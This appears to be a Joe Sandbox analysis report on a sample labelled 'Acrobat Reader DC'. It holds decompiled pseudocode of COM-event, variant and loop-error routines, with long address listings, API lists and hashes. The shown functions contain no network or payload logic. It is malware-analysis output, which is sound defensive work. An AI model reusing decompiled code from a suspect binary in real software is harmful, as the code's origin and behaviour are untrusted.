                                  0x0045eaa3
                                  0x0045eaab
                                  0x00000000
                                  0x00000000
                                  0x0045eac5
                                  0x0045eac8
                                  0x0045eacb
                                  0x0045eacb
                                  0x0045eacd
                                  0x0045ead0
                                  0x0045ead5
                                  0x0045ead8
                                  0x0045eadf
                                  0x0045eae2
                                  0x0045eaec
                                  0x00000000
                                  0x00000000
                                  0x0045eaef
                                  0x0045eaf2
                                  0x0045eaf5
                                  0x0045eaf7
                                  0x0045eafa
                                  0x0045eaff
                                  0x0045eb02
                                  0x0045eb05
                                  0x0045eb0c
                                  0x0045eb16
                                  0x00000000
                                  0x00000000
                                  0x0045ea3b
                                  0x0045ea35
                                  0x0045ea2c
                                  0x00000000

                                  APIs
                                  • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                  • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                  • VariantClear.OLEAUT32 ref: 0045EA6D
                                  • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                  • __swprintf.LIBCMT ref: 0045EC33
                                  • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                  Strings
                                  • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                  • String ID: %4d%02d%02d%02d%02d%02d
                                  • API String ID: 2441338619-1568723262
                                  • Opcode ID: 707bb89b8c24df81e4b6e45c7c0240a94ced01312171e31af911b1112949458a
                                  • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                  • Opcode Fuzzy Hash: 707bb89b8c24df81e4b6e45c7c0240a94ced01312171e31af911b1112949458a
                                  • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004091B0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 98%
                                  			E004091B0(void* __edx, void* __fp0, char _a4) {
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				char _v24;
				signed int* _v28;
				char _v32;
				signed int _v36;
				char _v40;
				short _v42;
				short _v44;
				char _v52;
				char _v60;
				signed int _v64;
				char _v72;
				char _v76;
				char _v80;
				signed int* _v84;
				char _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v120;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t133;
				signed int _t134;
				signed int _t141;
				intOrPtr _t163;
				signed int _t180;
				signed int _t181;
				intOrPtr _t185;
				void* _t186;
				intOrPtr _t188;
				signed int _t203;
				intOrPtr* _t204;
				intOrPtr _t209;
				char _t217;
				void* _t218;
				intOrPtr _t235;
				signed int _t239;
				void* _t243;
				signed int _t247;
				signed int _t250;
				intOrPtr _t257;
				signed int _t258;
				signed int _t264;
				signed int _t270;
				char _t271;
				signed int _t273;
				intOrPtr _t274;
				intOrPtr _t283;
				void* _t287;

				_t287 = __fp0;
				_t243 = __edx;
				if( *0x4a7f18 != 0) {
					_t271 = _a4;
					__eflags =  *((char*)(_t271 + 0x480)) - 1;
					if(__eflags == 0) {
						goto L1;
					}
					_t219 =  &_v120;
					_v24 = 0;
					_v88 = 0x488088;
					_v84 = 0;
					_v80 = 0;
					_v76 = 0;
					_v72 = 0;
					_v64 = 1;
					_v60 = 0;
					E0040BC70( &_v120, __eflags);
					InterlockedIncrement(0x4a7f04);
					_t133 =  *0x4a7f04; // 0x0
					__eflags = _t133 - 1;
					if(_t133 == 1) {
						L8:
						_t134 =  *0x4a7f0c; // 0x0
						__eflags =  *0x4a7f08 - _t134; // 0x0
						if(__eflags == 0) {
							L12:
							InterlockedDecrement(0x4a7f04);
							E00402250( &_v120);
							E00408F40(_t262,  &_v72);
							E00410C60( &_v88, _t262);
							goto L1;
						}
						_t12 = ((_t134 & 0x0000003f) << 4) + 0x4a9138; // 0x4a9138
						_t262 = _t12;
						_t141 = E00431DC9(_t262);
						__eflags = _t141;
						if(_t141 != 0) {
							goto L12;
						}
						_t13 = _t262 + 4; // 0x0
						_v36 = _t262;
						E00408E80( &_v72, _t219,  *((intOrPtr*)( *_t13)));
						_t16 = _t262 + 4; // 0x0
						_t216 = E0045340C( *((intOrPtr*)( *_t16 + 4)));
						E00402160( &_v120, _t146, _t243, _t262);
						_t19 = _t262 + 4; // 0x0
						_t262 = E0045340C( *((intOrPtr*)( *_t19 + 8)));
						E0040D200( &_v120,  *_t16, _t150, _t287);
						__eflags = E00465124(_v120,  &_v20, __eflags, _t271, _v120,  &_v32,  &_v20,  &_v28,  &_v40);
						if(__eflags != 0) {
							 *((char*)(_t271 + 0x480)) = 1;
							_t273 =  &_v104;
							E00401B10(L"@COM_EVENTOBJ", _t273, __eflags);
							E00401980(2, 1, E00432508( &_v72), _t273);
							_t226 = _t273;
							E00402250(_t273);
							_t163 = E0040F410(_v32);
							__eflags = _v20;
							_t274 = _t163;
							_v16 = _t274;
							if(_v20 <= 0) {
								L25:
								_t247 =  *0x4a7f0c; // 0x0
								_t250 = ((_t247 & 0x0000003f) << 4) + 0x4a9138;
								E0046FE32(_t250);
								_t264 = 1;
								 *0x4a7f0c =  *0x4a7f0c + 1;
								InterlockedDecrement(0x4a7f04);
								E0046FF07(_t216, 1, _v32);
								__eflags = _v20 - 1;
								if(_v20 < 1) {
									L48:
									_t217 = _a4;
									E0047D33E(_t226, _t250, _t287, _t217, _v32 + 1, 0, 0);
									E0046FEB1(0x4a7f34);
									_t265 = L"@COM_EVENTOBJ";
									E00401B10(L"@COM_EVENTOBJ",  &_v104, __eflags);
									E0040C2C0(2,  &_v104,  &_a4,  &_v24);
									E00402250( &_v104);
									__eflags =  *0x4a7f18;
									if( *0x4a7f18 == 0) {
										L29:
										 *((char*)(_t217 + 0x480)) = 0;
										L30:
										E00402250( &_v120);
										E00408F40(_t265,  &_v72);
										E00410C60( &_v88, _t265);
										return 1;
									}
									_t180 = E00432416(_a4);
									__eflags = _t180;
									if(_t180 != 0) {
										goto L29;
									}
									_t181 =  *0x4a7f1c; // 0x0
									__eflags = _t181;
									if(_t181 == 0) {
										goto L29;
									}
									 *((char*)(_t181 + 0x40)) = 0;
									goto L29;
								}
								_t62 = _t264 + 0xb; // 0xc
								_t218 = _t62;
								_v12 = 0x18;
								_v28 = _v84;
								while(1) {
									_v36 = _t264;
									__eflags = _t264 - _v24;
									if(_t264 <= _v24) {
										goto L40;
									}
									_v40 = 0;
									_v42 = 0;
									_t188 =  *((intOrPtr*)(_t274 + 4));
									_v104 = 0x485a84;
									_v100 = 0;
									_v96 = 0;
									_v92 = 0;
									_t235 =  *((intOrPtr*)(_t218 + _t188 + 4));
									__eflags =  *((short*)(_t235 + 8)) - 0x41;
									_v44 = _t250 | 0xffffffff;
									if( *((short*)(_t235 + 8)) != 0x41) {
										E00408F40(_t264,  &_v72);
										_v64 = 1;
										_v72 = 0;
										L39:
										_t250 =  &_v72;
										E00401980(1, 0, _t250,  *((intOrPtr*)( *((intOrPtr*)(_t218 +  *((intOrPtr*)(_v16 + 4)))))));
										E0044B469(__eflags,  &_v52);
										E0040EDC0( &_v104, _t264,  *((intOrPtr*)( *((intOrPtr*)(_t218 +  *((intOrPtr*)(_v16 + 4)))))));
										L41:
										_t185 =  *((intOrPtr*)(_v16 + 4));
										_t226 =  *(_t218 + _t185 + 4);
										__eflags =  *((short*)(_t226 + 8)) - 0x41;
										if( *((short*)(_t226 + 8)) != 0x41) {
											_t186 = 8;
											L47:
											_v12 = _v12 + _t186;
											_t264 = _t264 + 1;
											_t218 = _t218 + _t186;
											__eflags = _t264 - _v20;
											if(_t264 <= _v20) {
												_t71 =  &_v28;
												 *_t71 =  &(_v28[1]);
												__eflags =  *_t71;
												_t274 = _v16;
												continue;
											}
											goto L48;
										}
										_t250 =  *(_t218 + _t185 + 8);
										_t203 =  *(_t250 + 8) & 0x0000ffff;
										__eflags = _t203 - 0x4a;
										if(_t203 == 0x4a) {
											L45:
											_t186 = 0x14;
											goto L47;
										}
										__eflags = _t203 - 0x49;
										if(_t203 == 0x49) {
											goto L45;
										}
										_t186 = 0x10;
										goto L47;
									}
									_t195 =  *((intOrPtr*)(_t218 + _t188 + 8));
									_t239 =  *( *((intOrPtr*)(_t218 + _t188 + 8)) + 8) & 0x0000ffff;
									__eflags = _t239 - 0x4a;
									if(_t239 == 0x4a) {
										L36:
										E00402780(_t195, _t239,  &_v104);
										_t195 =  *((intOrPtr*)(_v12 +  *((intOrPtr*)(_t274 + 4))));
										L37:
										E00402780(_t195, _t239,  &_v104);
										E00402710(0x7f,  &_v52, _t287);
										E00402780( &_v52, _t239,  &_v104);
										E0040A780(_a4, _t287,  &_v104,  &_v40,  &_v72, 0xffffffff);
										_t264 = _v36;
										goto L39;
									}
									__eflags = _t239 - 0x49;
									if(_t239 != 0x49) {
										goto L37;
									}
									goto L36;
									L40:
									_t250 =  *_v28;
									__eflags = 0;
									E00401980(1, 0, _t250,  *((intOrPtr*)( *((intOrPtr*)(_t218 +  *((intOrPtr*)(_t274 + 4)))))));
									goto L41;
								}
							}
							_t216 = 3;
							_t265 = 3;
							while(1) {
								_t226 = _v36;
								__eflags = _t216 -  *((intOrPtr*)(_t226 + 8));
								if(_t216 >=  *((intOrPtr*)(_t226 + 8))) {
									goto L25;
								}
								_t283 =  *((intOrPtr*)(_t274 + 4));
								_t204 =  *((intOrPtr*)(_t283 + _t265 * 4));
								__eflags =  *((short*)(_t204 + 8));
								if( *((short*)(_t204 + 8)) != 0) {
									L22:
									_t257 =  *((intOrPtr*)(_t283 + 4 + _t265 * 4));
									_t270 = _t265 + 1;
									__eflags =  *((short*)(_t257 + 8)) - 0x41;
									if( *((short*)(_t257 + 8)) == 0x41) {
										_t270 = _t270 + 2;
										__eflags = _t270;
									}
									E0040BA10(_t216, _t226, _t270,  &_v88,  *((intOrPtr*)( *((intOrPtr*)(_t226 + 4)) + _t216 * 4)));
									_t274 = _v16;
									_t209 = _v24 + 1;
									_v24 = _t209;
									__eflags = _t209 - _v20;
									if(_t209 < _v20) {
										_t216 = _t216 + 1;
										_t265 = _t270 + 1;
										__eflags = _t265;
										continue;
									}
									goto L25;
								} else {
									goto L20;
								}
								while(1) {
									L20:
									__eflags =  *_t204 - 0x1e;
									if( *_t204 != 0x1e) {
										break;
									}
									_t204 =  *((intOrPtr*)(_t283 + 4 + _t265 * 4));
									_t265 = _t265 + 1;
									__eflags =  *((short*)(_t204 + 8));
									if( *((short*)(_t204 + 8)) == 0) {
										continue;
									}
									goto L22;
								}
								E0045E737(_t287, _a4, 0x91, 0xffffffff);
								goto L30;
							}
							goto L25;
						}
						_t258 =  *0x4a7f0c; // 0x0
						E0046FE32(((_t258 & 0x0000003f) << 4) + 0x4a9138);
						 *0x4a7f0c =  *0x4a7f0c + 1;
						__eflags =  *0x4a7f0c;
						goto L12;
					}
					_t262 = 2;
					while(1) {
						__eflags = _t262;
						if(_t262 == 0) {
							break;
						}
						InterlockedDecrement(0x4a7f04);
						Sleep(0xa);
						InterlockedIncrement(0x4a7f04);
						_t133 =  *0x4a7f04; // 0x0
						_t262 = _t262 - 1;
						__eflags = _t133 - 1;
						if(_t133 != 1) {
							continue;
						}
						goto L8;
					}
					__eflags = _t133 - 1;
					if(_t133 == 1) {
						goto L8;
					}
					goto L12;
				}
				L1:
				return 0;
			}

























































                                  0x004091b0
                                  0x004091b0
                                  0x004091c0
                                  0x0042c5fe
                                  0x0042c601
                                  0x0042c608
                                  0x00000000
                                  0x00000000
                                  0x0042c60e
                                  0x0042c611
                                  0x0042c618
                                  0x0042c61f
                                  0x0042c626
                                  0x0042c62d
                                  0x0042c634
                                  0x0042c63b
                                  0x0042c642
                                  0x0042c649
                                  0x0042c659
                                  0x0042c65b
                                  0x0042c660
                                  0x0042c663
                                  0x0042c697
                                  0x0042c697
                                  0x0042c69c
                                  0x0042c6a2
                                  0x0042c737
                                  0x0042c73c
                                  0x0042c745
                                  0x0042c74d
                                  0x0042c755
                                  0x00000000
                                  0x0042c755
                                  0x0042c6ae
                                  0x0042c6ae
                                  0x0042c6b5
                                  0x0042c6ba
                                  0x0042c6bc
                                  0x00000000
                                  0x00000000
                                  0x0042c6be
                                  0x0042c6c7
                                  0x0042c6ca
                                  0x0042c6cf
                                  0x0042c6db
                                  0x0042c6e0
                                  0x0042c6e5
                                  0x0042c6f1
                                  0x0042c6f6
                                  0x0042c715
                                  0x0042c717
                                  0x0042c76a
                                  0x0042c776
                                  0x0042c779
                                  0x0042c791
                                  0x0042c796
                                  0x0042c798
                                  0x0042c7a0
                                  0x0042c7a5
                                  0x0042c7a9
                                  0x0042c7ab
                                  0x0042c7ae
                                  0x0042c812
                                  0x0042c812
                                  0x0042c81e
                                  0x0042c825
                                  0x0042c82a
                                  0x0042c82f
                                  0x0042c83a
                                  0x0042c844
                                  0x0042c849
                                  0x0042c84c
                                  0x0042c9ec
                                  0x0042c9ef
                                  0x0042c9f9
                                  0x0042ca03
                                  0x0042ca08
                                  0x0042ca10
                                  0x0042ca22
                                  0x0042ca29
                                  0x0042ca2e
                                  0x0042ca35
                                  0x0042c87a
                                  0x0042c87a
                                  0x0042c881
                                  0x0042c884
                                  0x0042c88c
                                  0x0042c894
                                  0x00000000
                                  0x0042c899
                                  0x0042ca3f
                                  0x0042ca44
                                  0x0042ca46
                                  0x00000000
                                  0x00000000
                                  0x0042ca4c
                                  0x0042ca51
                                  0x0042ca53
                                  0x00000000
                                  0x00000000
                                  0x0042c876
                                  0x00000000
                                  0x0042c876
                                  0x0042c855
                                  0x0042c855
                                  0x0042c858
                                  0x0042c85f
                                  0x0042c8a7
                                  0x0042c8a7
                                  0x0042c8aa
                                  0x0042c8ad
                                  0x00000000
                                  0x00000000
                                  0x0042c8b5
                                  0x0042c8b8
                                  0x0042c8bc
                                  0x0042c8bf
                                  0x0042c8c6
                                  0x0042c8cd
                                  0x0042c8d4
                                  0x0042c8db
                                  0x0042c8e2
                                  0x0042c8e7
                                  0x0042c8eb
                                  0x0042c94c
                                  0x0042c951
                                  0x0042c958
                                  0x0042c95f
                                  0x0042c971
                                  0x0042c974
                                  0x0042c97d
                                  0x0042c985
                                  0x0042c9a5
                                  0x0042c9a8
                                  0x0042c9ab
                                  0x0042c9af
                                  0x0042c9b4
                                  0x0042c9d8
                                  0x0042c9dd
                                  0x0042c9dd
                                  0x0042c9e0
                                  0x0042c9e1
                                  0x0042c9e3
                                  0x0042c9e6
                                  0x0042c8a0
                                  0x0042c8a0
                                  0x0042c8a0
                                  0x0042c8a4
                                  0x00000000
                                  0x0042c8a4
                                  0x00000000
                                  0x0042c9e6
                                  0x0042c9b6
                                  0x0042c9ba
                                  0x0042c9be
                                  0x0042c9c2
                                  0x0042c9d1
                                  0x0042c9d1
                                  0x00000000
                                  0x0042c9d1
                                  0x0042c9c4
                                  0x0042c9c8
                                  0x00000000
                                  0x00000000
                                  0x0042c9ca
                                  0x00000000
                                  0x0042c9ca
                                  0x0042c8ed
                                  0x0042c8f1
                                  0x0042c8f5
                                  0x0042c8f9
                                  0x0042c901
                                  0x0042c904
                                  0x0042c90f
                                  0x0042c912
                                  0x0042c915
                                  0x0042c922
                                  0x0042c92c
                                  0x0042c93f
                                  0x0042c944
                                  0x00000000
                                  0x0042c944
                                  0x0042c8fb
                                  0x0042c8ff
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042c98c
                                  0x0042c995
                                  0x0042c99e
                                  0x0042c9a0
                                  0x00000000
                                  0x0042c9a0
                                  0x0042c8a7
                                  0x0042c7b0
                                  0x0042c7b5
                                  0x0042c7bb
                                  0x0042c7bb
                                  0x0042c7be
                                  0x0042c7c1
                                  0x00000000
                                  0x00000000
                                  0x0042c7c3
                                  0x0042c7c6
                                  0x0042c7c9
                                  0x0042c7ce
                                  0x0042c7e5
                                  0x0042c7e5
                                  0x0042c7e9
                                  0x0042c7ea
                                  0x0042c7ef
                                  0x0042c7f1
                                  0x0042c7f1
                                  0x0042c7f1
                                  0x0042c7fe
                                  0x0042c806
                                  0x0042c809
                                  0x0042c80a
                                  0x0042c80d
                                  0x0042c810
                                  0x0042c7b9
                                  0x0042c7ba
                                  0x0042c7ba
                                  0x00000000
                                  0x0042c7ba
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042c7d0
                                  0x0042c7d0
                                  0x0042c7d0
                                  0x0042c7d3
                                  0x00000000
                                  0x00000000
                                  0x0042c7d9
                                  0x0042c7dd
                                  0x0042c7de
                                  0x0042c7e3
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042c7e3
                                  0x0042c86f
                                  0x00000000
                                  0x0042c86f
                                  0x00000000
                                  0x0042c7bb
                                  0x0042c719
                                  0x0042c72c
                                  0x0042c731
                                  0x0042c731
                                  0x00000000
                                  0x0042c731
                                  0x0042c665
                                  0x0042c66a
                                  0x0042c66a
                                  0x0042c66c
                                  0x00000000
                                  0x00000000
                                  0x0042c677
                                  0x0042c67f
                                  0x0042c68a
                                  0x0042c68c
                                  0x0042c691
                                  0x0042c692
                                  0x0042c695
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042c695
                                  0x0042c75f
                                  0x0042c762
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042c768
                                  0x004091c6
                                  0x00000000

                                  APIs
                                  • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                  • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                  • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                  • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                  • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Interlocked$DecrementIncrement$Sleep
                                  • String ID: @COM_EVENTOBJ
                                  • API String ID: 327565842-2228938565
                                  • Opcode ID: 70307c3fe60be0ab36e309062113007dfb865a7b1b1bb36a34d2cd10d052add5
                                  • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                  • Opcode Fuzzy Hash: 70307c3fe60be0ab36e309062113007dfb865a7b1b1bb36a34d2cd10d052add5
                                  • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0046C84C Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 308COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 21%
                                  			E0046C84C(intOrPtr _a4, void* _a8, char _a12, intOrPtr _a16) {
				char* _v8;
				char* _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr* _v40;
				intOrPtr* _v44;
				intOrPtr* _v48;
				char _v52;
				char _v68;
				void* _v76;
				char _v84;
				intOrPtr* _v92;
				char _v100;
				char _v132;
				void* __edi;
				void* __esi;
				short* _t76;
				intOrPtr _t89;
				intOrPtr* _t92;
				char _t95;
				intOrPtr* _t100;
				intOrPtr* _t102;
				intOrPtr _t104;
				intOrPtr* _t106;
				intOrPtr* _t155;
				intOrPtr* _t156;
				intOrPtr* _t157;
				intOrPtr* _t158;
				intOrPtr* _t159;
				intOrPtr* _t160;
				intOrPtr* _t161;
				intOrPtr* _t162;

				_t162 = _a12;
				_t155 = _a8;
				_a8 = 0;
				_v8 = L"_NewEnum";
				_v12 = L"get__NewEnum";
				_v52 = 0;
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0x20404;
				_v32 = 0;
				_v28 = 0xc0;
				_v24 = 0x46000000;
				E00412F40( &_v132, 0, 0x20);
				if(_t155 == 0 || _a16 == 0 || _t162 == 0) {
					L34:
					_push(1);
					_push(L"Null Object assignment in FOR..IN loop");
					goto L35;
				} else {
					if(E00432416(_t162) != 0) {
						L21:
						_t76 =  *_t162;
						__eflags = _t76;
						if(_t76 != 0) {
							__eflags =  *_t76 - 0xd;
							if( *_t76 == 0xd) {
								_t156 =  *((intOrPtr*)(_t76 + 8));
								__imp__#8( &_v68);
								__imp__#9( &_v68);
								_t157 =  *((intOrPtr*)( *((intOrPtr*)( *_t156 + 0xc))))(_t156, 1,  &_v68,  &_a8);
								__eflags = _t157;
								if(_t157 >= 0) {
									L29:
									__eflags = _a8;
									if(_a8 == 0) {
										L32:
										_v68 = 1;
										E00408F40(_t157, _t162);
										 *((intOrPtr*)(_t162 + 8)) = 1;
										 *_t162 = 0;
										_push( &_v68);
									} else {
										__eflags = _t157 - 1;
										if(_t157 == 1) {
											goto L32;
										} else {
											_push( &_v68);
										}
									}
									E00468070(_a16);
									__imp__#9( &_v68);
									__eflags = 0;
									return 0;
								} else {
									__eflags = _t157 - 1;
									if(_t157 == 1) {
										goto L29;
									} else {
										E00408F40(_t157, _t162);
										 *((intOrPtr*)(_t162 + 8)) = 1;
										 *_t162 = 0;
										return E00451B42(_a4, _t157, 0, 0, 1);
									}
								}
							} else {
								_push(1);
								_push(L"Incorrect Object type in FOR..IN loop");
								L35:
								_push(0);
								_push(1);
								_push(_a4);
								return E00451B42();
							}
						} else {
							return E00451B42(_a4, 1, 0, L"Null Object assignment in FOR..IN loop", 1);
						}
					} else {
						_t89 =  *_t155;
						if(_t89 == 0 ||  *((intOrPtr*)(_t155 + 8)) != 8) {
							return E00451B42(_a4, 2, 0, L"Null Object assignment in FOR..IN loop", 1);
						} else {
							_t158 =  *((intOrPtr*)(_t89 + 8));
							if(_t158 != 0) {
								_t92 =  *((intOrPtr*)( *((intOrPtr*)( *_t158 + 0x14))))(_t158, 0x482a18,  &_v8, 1, 0x400,  &_a12);
								__eflags = _t92;
								if(_t92 < 0) {
									L10:
									__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t158 + 0x14))))(_t158, 0x482a18,  &_v12, 1, 0x400,  &_a12);
									if(__eflags < 0) {
										L12:
										_a12 = 0xfffffffc;
									} else {
										__eflags = _a12 - 0xffffffff;
										if(__eflags == 0) {
											goto L12;
										}
									}
								} else {
									__eflags = _a12 - 0xffffffff;
									if(__eflags == 0) {
										goto L10;
									}
								}
								_t95 = E00410E53(_t158, _t162, __eflags);
								_v16 = _t95;
								_v52 = _t95;
								_v44 = 0;
								__imp__#8( &_v100, 0x10);
								_t100 =  *((intOrPtr*)( *((intOrPtr*)( *_t158 + 0x18))))(_t158, _a12, 0x482a18, 0x800, 3,  &_v52,  &_v100,  &_v132,  &_v20);
								_push(_v16);
								_t159 = _t100;
								E0041351D();
								__eflags = _t159;
								if(_t159 >= 0) {
									_t102 = _v92;
									__eflags = _t102;
									if(_t102 == 0) {
										goto L34;
									} else {
										_v84 = 0xd;
										_t160 = _t102;
										_t104 =  *((intOrPtr*)( *((intOrPtr*)( *_t102))))(_t102,  &_v36,  &_v76);
										_v16 = _t104;
										 *((intOrPtr*)( *((intOrPtr*)( *_t160 + 8))))(_t160);
										_t106 = _v76;
										_t161 = _t106;
										__eflags = _t106;
										if(_t106 != 0) {
											 *((intOrPtr*)( *((intOrPtr*)( *_t106 + 0x14))))(_t106);
											E00468070(_t162,  &_v84);
											 *((intOrPtr*)( *((intOrPtr*)( *_t161 + 8))))(_t161);
											goto L21;
										} else {
											return E00451B42(_a4, _v16, 0, 0, 1);
										}
									}
								} else {
									_push(1);
									_push(0);
									__eflags = _t159 - 0x80020009;
									if(_t159 != 0x80020009) {
										_push(0);
										_push(_t159);
										_push(_a4);
										return E00451B42();
									} else {
										_push( &_v132);
										_push(_t159);
										_push(_a4);
										return E00451B42();
									}
								}
							} else {
								return E00451B42(_a4, 2, 0, L"Null Object assignment in FOR..IN loop", 1);
							}
						}
					}
				}
			}







































                                  0x0046c857
                                  0x0046c85b
                                  0x0046c869
                                  0x0046c86c
                                  0x0046c873
                                  0x0046c87a
                                  0x0046c87d
                                  0x0046c880
                                  0x0046c883
                                  0x0046c886
                                  0x0046c88d
                                  0x0046c890
                                  0x0046c897
                                  0x0046c89e
                                  0x0046c8a8
                                  0x0046cb43
                                  0x0046cb43
                                  0x0046cb45
                                  0x00000000
                                  0x0046c8bf
                                  0x0046c8c7
                                  0x0046ca52
                                  0x0046ca52
                                  0x0046ca54
                                  0x0046ca56
                                  0x0046ca90
                                  0x0046ca94
                                  0x0046caa2
                                  0x0046caa9
                                  0x0046cab3
                                  0x0046cacb
                                  0x0046cacd
                                  0x0046cacf
                                  0x0046cafb
                                  0x0046cafb
                                  0x0046cafe
                                  0x0046cb0b
                                  0x0046cb10
                                  0x0046cb14
                                  0x0046cb1c
                                  0x0046cb23
                                  0x0046cb25
                                  0x0046cb00
                                  0x0046cb00
                                  0x0046cb03
                                  0x00000000
                                  0x0046cb05
                                  0x0046cb08
                                  0x0046cb08
                                  0x0046cb03
                                  0x0046cb29
                                  0x0046cb32
                                  0x0046cb38
                                  0x0046cb40
                                  0x0046cad1
                                  0x0046cad1
                                  0x0046cad4
                                  0x00000000
                                  0x0046cad6
                                  0x0046cad6
                                  0x0046cae4
                                  0x0046caeb
                                  0x0046caf8
                                  0x0046caf8
                                  0x0046cad4
                                  0x0046ca96
                                  0x0046ca96
                                  0x0046ca98
                                  0x0046cb4a
                                  0x0046cb4d
                                  0x0046cb4e
                                  0x0046cb50
                                  0x0046cb5c
                                  0x0046cb5c
                                  0x0046ca58
                                  0x0046ca71
                                  0x0046ca71
                                  0x0046c8cd
                                  0x0046c8cd
                                  0x0046c8d1
                                  0x0046ca8d
                                  0x0046c8e1
                                  0x0046c8e1
                                  0x0046c8e6
                                  0x0046c91e
                                  0x0046c920
                                  0x0046c922
                                  0x0046c92a
                                  0x0046c946
                                  0x0046c948
                                  0x0046c950
                                  0x0046c950
                                  0x0046c94a
                                  0x0046c94a
                                  0x0046c94e
                                  0x00000000
                                  0x00000000
                                  0x0046c94e
                                  0x0046c924
                                  0x0046c924
                                  0x0046c928
                                  0x00000000
                                  0x00000000
                                  0x0046c928
                                  0x0046c959
                                  0x0046c95e
                                  0x0046c961
                                  0x0046c96b
                                  0x0046c96e
                                  0x0046c99a
                                  0x0046c99f
                                  0x0046c9a0
                                  0x0046c9a2
                                  0x0046c9aa
                                  0x0046c9ac
                                  0x0046c9e4
                                  0x0046c9e7
                                  0x0046c9e9
                                  0x00000000
                                  0x0046c9ef
                                  0x0046c9f4
                                  0x0046ca02
                                  0x0046ca07
                                  0x0046ca0f
                                  0x0046ca12
                                  0x0046ca14
                                  0x0046ca17
                                  0x0046ca19
                                  0x0046ca1b
                                  0x0046ca3d
                                  0x0046ca45
                                  0x0046ca50
                                  0x00000000
                                  0x0046ca1d
                                  0x0046ca34
                                  0x0046ca34
                                  0x0046ca1b
                                  0x0046c9ae
                                  0x0046c9ae
                                  0x0046c9b0
                                  0x0046c9b1
                                  0x0046c9b7
                                  0x0046c9d3
                                  0x0046c9d4
                                  0x0046c9d5
                                  0x0046c9e1
                                  0x0046c9b9
                                  0x0046c9bf
                                  0x0046c9c0
                                  0x0046c9c1
                                  0x0046c9cd
                                  0x0046c9cd
                                  0x0046c9b7
                                  0x0046c8e8
                                  0x0046c901
                                  0x0046c901
                                  0x0046c8e6
                                  0x0046c8d1
                                  0x0046c8c7

                                  APIs
                                  • _memset.LIBCMT ref: 0046C89E
                                  • VariantInit.OLEAUT32(?), ref: 0046C96E
                                    • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
